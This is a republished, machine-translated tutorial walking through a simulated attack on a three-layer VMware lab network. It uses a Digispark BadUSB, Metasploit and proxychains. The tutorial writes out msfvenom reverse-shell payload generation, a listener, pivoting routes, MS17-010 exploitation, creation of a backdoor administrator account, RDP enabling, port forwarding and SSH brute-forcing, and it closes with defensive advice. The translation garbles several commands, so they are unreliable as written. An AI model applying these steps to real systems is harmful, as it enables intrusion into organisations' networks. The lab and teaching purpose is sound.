Shulou(Shulou.com)05/31 Report--

How to use BadUSB to penetrate three layers of intranet, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

As a security worker, I have heard many social worker APT cases, such as phishing email, puddle attack, dropping a U disk, etc. Some time ago, I learned in a training that the attack mode of BadUSB can be controlled by U disk. In the famous American TV series "Legion of hackers", there is also a scene of throwing BadUSB in the parking lot to go fishing.

In a moment of curiosity, I tried to simulate a social worker, built a three-layer network shooting range using VMware, and infiltrated the third layer network step by step through the attack means of BadUSB+MSF.

Construction of 0x01 three-layer Network shooting range

The network topology of this simulation experiment is as follows:

The first layer network, the simulation enterprise office network, is a win7 employee office computer, the second layer network simulation intranet, is a win2003 server, the third layer network is the enterprise core network, is a Linux server. The attackers' attack machines are kali and win10.

We can use VMware to build a network environment of layer 3 network. First, create 3 NICs in the virtual machine and choose host-only mode:

We set kali as the layer 1 network vmnet1 and select a custom vmnet1 in the network adapter:

Add a network to the win7 virtual machine setting of the first layer target machine, and set the two networks to vmnet1 and vmnet2 respectively to achieve the effect of dual network cards:

Similarly, the second layer target machine win2003 is set to dual network cards vmnet2 and vmnet3:

Finally, set the network of layer 3 target machine linux to vmnet3:

At this point, the layer 3 network shooting range of our experiment has been built, and the attacker's kali can only access the layer 1 network, but cannot access the layer 2 and layer 3 target aircraft:

0x02 BadUSB introduction

Effect demonstration

Before introducing BadUSB, let's take a look at his power. The U disk below looks like a U disk, but in fact it is a single-chip microcomputer, and ordinary people are easily confused.

I demonstrated on the local win10, my system is equipped with antivirus software, and the patch is updated to the latest, but when I checked the u disk above to the computer, it achieved the effect of arbitrary command execution.

Of course, the above operation is only for demonstration, we can use it to do more covert attacks.

What is BadUSB?

Simply put, the USB device is disguised as a keyboard, and the plugged computer is caught off guard by typing in a certain "instruction" that quickly turns the computer into a broiler, a vulnerability that was first announced at the BlackHat Security Conference in 2014. The most terrible thing about BadUSB is that the malicious code exists in the firmware of the USB disk. Because the antivirus software on the PC cannot access the area where the firmware is stored on the USB disk, it means that neither the antivirus software nor the USB disk format can respond to BadUSB attacks.

Common BadUSB

1 、 TEENSY

When customizing the attack device, the attacker will put an attack chip into the USB device, which is a very small and fully functional single-chip microcomputer development system, its name is TEENSY. Through TEENSY you can simulate a keyboard and mouse. When you plug in this custom USB device, the computer will recognize it as a keyboard. Using the microprocessor and storage space in the device and the attack code programmed into it, you can send control commands to the host, thus completely controlling the host, regardless of whether automatic playback is turned on or not and whether antivirus software is installed or not.

2 、 USB RUBBER DUCKY

Referred to as USB rubber duck, is the earliest keystroke injection tool, realized through embedded development board, and later developed into a fully mature commercial keystroke injection attack platform. Its principle is also to simulate the USB device as a keyboard, let the computer recognize it as a keyboard, and then script to simulate keystrokes to attack.

Make a simple BadUSB

To make a BadUSB, we need the following tools:

1. BadUSB equipment is currently available on Taobao. What we choose here is Digispark,Digispark, a USB development board based on ATTINY85 microcontroller, which is small in size and cheap. Taobao sells https://item.taobao.com/item.htm?spm=a1z09.2.0.0.57db2e8dK2zETX&id=559310622821&_u=b50qdl8ef4d.

2 、 Arduino IDE

The compiler used by Arduino IDE to burn the code can burn our malicious code into BadUSB, configure the relevant parameters, set the development board to Digispark and the programmer to USBtinyISP:

After writing the code, we can click the "upload" button, then insert the BadUSB device, and a simple BadUSB is done.

0x03 MSF intranet penetration

With the knowledge of BadUSB above, we can simulate a social worker scenario: insiders pick up a "U disk" and plug it into their office computer out of curiosity, and this "U disk" is actually a BadUSB, which automatically downloads the back door made by the attacker with MSF, so after plugging in the U disk, the employee's office computer is already controlled by hackers. As a result, hackers can further infiltrate and expand the intranet. Let's take a look at how to use MSF for intranet penetration step by step:

Make the MSF back door:

Msf's msfvenom command generates the backdoor we need:

Msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666-f exe > shell.exe

Where 192.168.59.128 is the address of the msf listener and 6666 is the port of the msf listener. We put the generated shell.exe on the web service built in the card.

MSF enables listening:

On the MSF server, we enable listening and wait for win7 to rebound shell:

Use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.59.128set LPORT 6666exploit

BadUSB burns into the attack program

According to the payload routines that are actually monitored in our work, we burn the following program into BadUSB to let the first layer target machine Win7 automatically download the created shell.exe from the attacker's kali and execute it:

In this way, when the win7 is plugged into the USB disk, the attacker's msf gets a bouncing shell:

Meterpreter infiltration

Meterpreter is a module in MSF. Attacking payload returns us a control channel-Meterpreter shell after the attack is successful. As an infiltration module, Meterpreter shell has many useful functions, such as adding a user, opening shell, getting the user's password, uploading and downloading files of the remote host, running cmd.exe, capturing the screen, obtaining remote control, capturing keystroke information, clearing applications, displaying the system information of the remote host, displaying the network interface and IP address of the remote machine, and so on.

We can enter shell in meterpreter to get the shell of the target win7, execute ipconfig, and find the network segment information of the layer 2 network:

In order for MSF to continue to infiltrate the layer 2 network, we first need to add a routing table:

Metepreter > run autoroute-s 192.168.90.0 Universe 24

In this way, traffic to the 192.168.90.0swap 24 network segment is routed through the session2 of meterpreter. Then, we start the socks agent in msf:

Msf > use auxiliary/server/socks4a msf > set srvhost 192.168.59.128 msf > set srvport 9999 msf > run

In this way, other attacking software can penetrate the second layer through MSF socks agents and added routes.

At this time, we can already access the layer 2 network 192.168.90.0swap 24. According to the common penetration thinking, we will scan the layer 2 network to see which surviving hosts are available, such as scanning with nmap, but before that, we also need to configure proxychain in kali to scan the layer 2 network through proxychain to send nmap traffic through msf's socks agent.

Configure proxychain

Modify / etc/proxychains.conf to set the server and port in it to the information of msf socksserver:

At this point, we can use nmap to detect the layer 2 network:

Because proxychains cannot proxy icmp packets, you must add the-Pn-sT parameter, that is, do not detect whether the host is alive, but directly scan the port tcp.

Proxychains nmap-Pn-sT-p80 sT 3306 445 3389 22 192.168.90.129-132

Through the scan, we found that the address of the target in the second layer network is 192.168.90.129, and ports 80,445,3306 and 3389 are opened at the same time, so the next step of penetration can be considered from these ports. Here are a few ideas, you can find loopholes from port 80, try to upload webshell,3306 and 3389, you can try password explosion, and port 445 will be the first to think of the famous MS17-010, Eternal Blue.

The blue of eternity

Although it has been more than a year since the wannacry incident, the existence of ms17-010vulnerabilities in the private network is not uncommon in various industries. In this simulation environment, the second layer network win2003 has this vulnerability. We can use msf to directly exploit ms17-010s, get the shell, and configure the attack parameters. Since the layer 2 server cannot communicate directly with the attacker's kali, note here that payload should be set to bind_tcp. That is to say, the forward agent mode is adopted.

Successful attack, get meterpreter shell:

With system permission, we can change the administrator password or add a new administrator user:

Net user tinhyfisher tinyfisher / add add user tinyfisher password tinyfisher net localgroup administrators tinyfisher / add upgrade account tinyfishe to administrator

Port forwarding

We see that the win2003 server on the second layer is 3389, and we can log in to the remote desktop. It doesn't matter if it's not turned on, we can turn it on with the following command.

Metepreter > run getgui-e or metepreter > run post/windows/manage/enable_rdp

Now, we can't access 3389 of the second layer directly from the outermost layer, we need to forward 3389 of the traffic to log in to the remote desktop:

Metepreter > portfwd add-l 7777-p 3389-r 192.168.90.129 # forward the 3389 port of the target 192.168.90.129 to the local kali 7777 port

At this point, we have been able to remotely log in and control the second layer target aircraft on our own attack aircraft.

Layer 3 network penetration

Similarly, if we want to further infiltrate the layer 3 network, the first step is to add routes to layer 3:

Then use nmap to detect layer 3 network port information:

Opened ports 80 and 22, the idea is more obvious, to get permission, either the ssh password burst, or from the web to find loopholes to pass webshell.

Password blasting

First try the first idea to see if there is a weak password in ssh. We use the auxiliary/scanner/ssh/ssh_login module, configure the user name and dictionary, and start exploding:

Sure enough, there is a weak password of 123456, and you can get root permission directly.

Web infiltration

We can configure kali as a proxy server in the browser to access the layer 3 network:

Open the visit and find that it is Typecho's blog system:

Generally speaking, our idea for this kind of CMS is to go directly to the Internet to search for the vulnerability poc of CMS for testing. Here is no further demonstration:

So far, we let the win7 system in the first layer of the network download and run our malware through BadUSB, and then use MSF to penetrate the three layers of intranet by means of MS17-010, password blasting, web penetration, and finally win the authority of the third layer of the network system. For common infiltration ideas, please refer to the following brain map:

This simulation is only the simplest demonstration, and the actual situation will be much more complicated than this. For example, the target will install antivirus software, so when downloading the msf backdoor using BadUSB, you need to consider how to avoid killing, otherwise it is easy to be found. Each network segment is generally isolated, so how to find a network breakthrough is more difficult. There will be a variety of internal security devices, such as IDS, honeypot, TDA and so on, so real penetration is much more difficult than this test.

However, the employees' security awareness here is poor, the patch update is not timely, the antivirus software is not installed or the virus database is not updated in time, and the problems of weak password in the system are often encountered in practical work. it is very important to do a good job in the basic work of enterprise security.

Finally, there are many cases of attacks through the USB interface, BadUSB is only one category, and there are cases of attacks across PC and Mobile platforms through the USB interface. When we use USB devices, we should not use unfamiliar USB devices to avoid security risks caused by malicious code in USB.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.